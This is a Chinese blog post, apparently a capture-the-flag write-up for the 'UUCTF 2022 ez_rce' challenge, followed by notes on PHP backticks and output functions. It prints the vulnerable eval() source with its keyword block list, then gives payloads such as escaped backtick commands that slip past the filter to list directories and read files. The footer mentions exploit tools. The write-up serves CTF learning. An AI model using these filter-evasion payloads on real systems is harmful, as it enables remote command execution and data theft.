命令执行 [UUCTF 2022 新生赛]ez_rce

最新推荐文章于 2024-06-14 11:17:39 发布
最新推荐文章于 2024-06-14 11:17:39 发布
阅读量1k 收藏 16
点赞数 20
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/136330167
版权

打开题目

得到题目源码

居然都不输入参数,可恶!!!!!!!!!

<?php
## 放弃把,小伙子,你真的不会RCE,何必在此纠结呢????????????
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){
        echo '看看你输入的参数!!!不叫样子!!';echo '<br>';
        eval($code);
    }
    else{
        die("你想干什么?????????");
    }
}
else{
    echo "居然都不输入参数,可恶!!!!!!!!!";
    show_source(__FILE__);
}

代码审计一下

get传入的code参数如果存在的话就赋值给code参数,如果参数里面没有/sys,pas等符号就输出一句话且执行code参数里面的命令

如果有的话,就退出脚本运行并输出一句话,如果code参数的值不存在就输出另外一句话。

解题思路

我们可以先尝试一下,这里是php语句,所以我们要在语句最后加上;

?code=print(`l\s`);

这里用printf也是一样的结果

得到

那我们去查看一下根目录

?code=print(`l\s /`);

发现了flag

构造payload:

/?code=print(`c\at /fffffffffflagafag`);

得到flag

或者我们直接用var_dump命令也是一样的

/?code=var_dump(`c\at /fffffffffflagafag`);

知识点:

php语句中反引号 `` 的作用

1.在sql语句中用来包含关键字

如,加上反引号就不会有因为字段是关键字而出错的问题

$sql = "select `user`,username from `Content`";

为了保险起见,我们建议在所有字段中都加上反引号,即上面的SQL建议写成

$sql = "select `user`,`username` from `Content`";

2.执行系统命令

PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回

如:

echo `ipconfig`

知识点参考:php中``反引号的作用_`反单引号在php语言以及sql语言中的作用分别是什么?-CSDN博客

PHP中的输出:echo、print、printf、sprintf、print_r和var_dump

  • echo

最基础的输出语句,不需要括号,可以使用参数列表,用逗号分隔。但如果加了括号就不能用逗号分隔着输出了。没有返回值

echo 'fullstackpm'; // 正常输出:fullstackpm
echo 'fullstackpm', ' is ', 'Good!'; // 正常输出:fullstackpm is Good!
echo ('fullstackpm'); // 正常输出:fullstackpm
echo ('fullstackpm', ' is ', 'Good!'); // 报错了

  • print

基本和echo一样,但是不支持参数列表,有返回值。返回值永远是1,因为有返回值,所以相对来说效率不如echo

print 'fullstackpm'; // 正常输出:fullstackpm
print 'fullstackpm', ' is ', 'Good!'; // 错误
$r = print ('fullstackpm'); // 正常输出:fullstackpm
print $r; // 输出1

  • printf和sprintf

二者都可以格式化输出字符串。printf和sprintf的区别就是前者直接进行了输出,而后者是将字符串进行了函数返回

$str = 'My name is %s, I\'m %d years old.';
printf($str, 'fullstackpm', 1002); // 直接输出:My name is fullstackpm, I'm 1002 years old.

$s = sprintf($str, 'WoW', 12); // 这里不会输出
print $s; // 输出:My name is WoW, I'm 12 years old.
规定符
  • %d 十进制有符号整数
  • %u 十进制无符号整数
  • %f 浮点数
  • %s 字符串
  • %c 单个字符
  • %p 指针的值
  • %e 指数形式的浮点数
  • %x, %X 无符号以十六进制表示的整数
  • %o 无符号以八进制表示的整数
  • %g 把输出的值按照 %e 或者 %f 类型中输出长度较小的方式输出
  • %p 输出地址符
  • %lu 32位无符号整数
  • %llu 64位无符号整数
  • %% 输出百分号字符本身。

除了格式化说明符之外,printf() 函数还支持一些标志和选项,用于控制输出的精度、宽度、填充字符和对齐方式等。例如:

  • %-10s:左对齐并占用宽度为 10 的字符串;
  • %5.2f:右对齐并占用宽度为 5,保留两位小数的浮点数;
  • %#x:输出带有 0x 前缀的十六进制数。

(具体使用见:C 库函数 – printf() | 菜鸟教程

  • print_r

可以格式化的输出数组或对象。注意第二个参数设置为true,可以不直接输出而是进行函数返回

  • var_dump和var_exports

var_dump用来显示结构信息,包括类型与值,数组对象都会展开,用缩进表示层次。

var_exports与之不同的地方在于var_exports返回的内容是正常的PHP代码,可以直接使用,并且有和print_r类似的第二个return参数,作用也类似。

参考文章:PHP中的输出:echo、print、printf、sprintf、print_r和var_dump-腾讯云开发者社区-腾讯云

访白鹿
关注
  • 20
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[UUCTF 2022 新生]ez_rce(1),2024年大厂网络安全面经
m0_61549953的博客
04-06 817
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --&...
[UUCTF 2022 新生]ez_rce
m0_73612768的博客
01-03 965
反引号命令执行;shell 绕过关键字过滤;
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生]ez_rce
weixin_46497491的博客
11-07 3773
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce
[SWPUCTF 2022 新生]ez_rce
wyxlsm的博客
03-22 638
在写真不知道怎么下手 我去扫一下 后门文件 是有一些 tp5 的think php的漏洞 不说了 看下一步。这样我们看到flag 值 我们可以去访问他 得到flag。查看一下根目录下的flag 名字的文件。我们可以去访问他 得到。去利用漏洞利用的命令
[UUCTF 2022 新生]ez_rce,零基础学习网络安全
m0_61549953的博客
04-06 640
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
[UUCTF 2024 新生]ez_rce,你还看不明白
2301_78399466的博客
04-14 688
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
2022 UUCTF Web
weixin_63231007的博客
12-19 2176
2022UUCTF web部分题分析
UUCTF2022-Writeup
Ivyyyyyy1的博客
10-31 1367
UUCTF2022 Writeup
【Web】UUCTF 2022 新生 个人复现
uuzeray的博客
12-01 822
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。因此md5[0]应该传入%0a0e215962017,但是我们又多了一个%0a 换行符,通过上面这行代码 $md5[0]=substr($md5[0],$sub);$md5[1]===$guessmd5,后者是1秒一变的,得写脚本了。
TDOA_RCE:通达OA综合利用工具
03-03
工具说明 通达OA综合利用工具_20210224 集成POC如下 任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 ...
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
SMBGhost_RCE_PoC-master.zip
06-11
CVE-2020-0796代码执行EXP,接管主机权限,获取用户shell。该文件主要以学习为主,请遵守网络安全法,如若造成破坏,与本人无关。
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
Java中如何调用mysql中函数
codedadi的博客
06-10 740
在前端直接调用 MySQL 中的函数是不直接可能的,因为前端(如 JavaScript 在浏览器中)没有直接访问数据库的能力。请注意,安全性是这种交互中的一个重要考虑因素。确保你的后端 API 是安全的,并验证所有传入的请求和参数以防止潜在的安全风险,如 SQL 注入攻击。设置CallableStatement的参数(如果需要):如果你的函数需要参数,使用CallableStatement的setXXX方法来设置它们。在你的后端服务中,编写一个 API 端点,该端点调用 MySQL 数据库中的函数。
PHP中的while循环:用法、技巧与最佳实践
最新发布
NatLindsay的博客
06-14 321
在PHP编程中,while循环是一种基本且常用的控制结构,用于重复执行代码块,直到指定条件为假。while循环在处理未知迭代次数的任务时特别有用,例如读取文件内容、处理用户输入或动态生成数据等。与for循环不同,while循环适用于那些无法预先确定循环次数的情境。,只要条件为真,循环体内的代码就会被一遍又一遍地执行。理解和灵活运用while循环,可以帮助开发者更高效地处理重复性任务,提高代码的可读性和维护性。
【MySQL】服务器配置和管理
p_fly的博客
06-09 820
MySQL服务器通常说的是mysqld程序。mysqld 是 MySQL 数据库服务器的核心程序,负责处理客户端的请求、管理数据库和执行数据库操作。管理员可以通过配置文件和各种工具来管理和监控 mysqld 服务器的运行本文将介绍下面三个内容:服务器启动选项:可以在命令行和配置文件中指定,用于配置服务器的行为和特性。服务器系统变量:反映了启动选项的当前状态和值,其中一些变量可以在服务器运行时修改。服务器状态变量:包含了关于运行时操作的计数器和统计信息。
Android.基本用法学习笔记
2301_78955442的博客
06-10 443
先在strings.xml声明变量方法1.方法2.
攻防世界php_rce
08-26
攻防世界中的php_rce是指一种利用PHP解释器的远程代码执行漏洞进行攻击和防御的技术。这种漏洞可以允许攻击者将恶意的PHP代码注入到服务器上,并执行任意命令。引用中的payload是构造了一个用于执行"ls /flag"命令的payload,而引用中的payload则是用于执行"cat /flag"命令的。这些payload利用了PHP解释器中的函数调用漏洞,通过构造特定的函数调用参数来执行系统命令。所以,这些payload可以用于远程执行系统命令,如列出/flag目录下的文件或显示/flag文件的内容。请注意,这些payload仅用于演示和研究目的,并且在现实环境中使用它们是违法的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值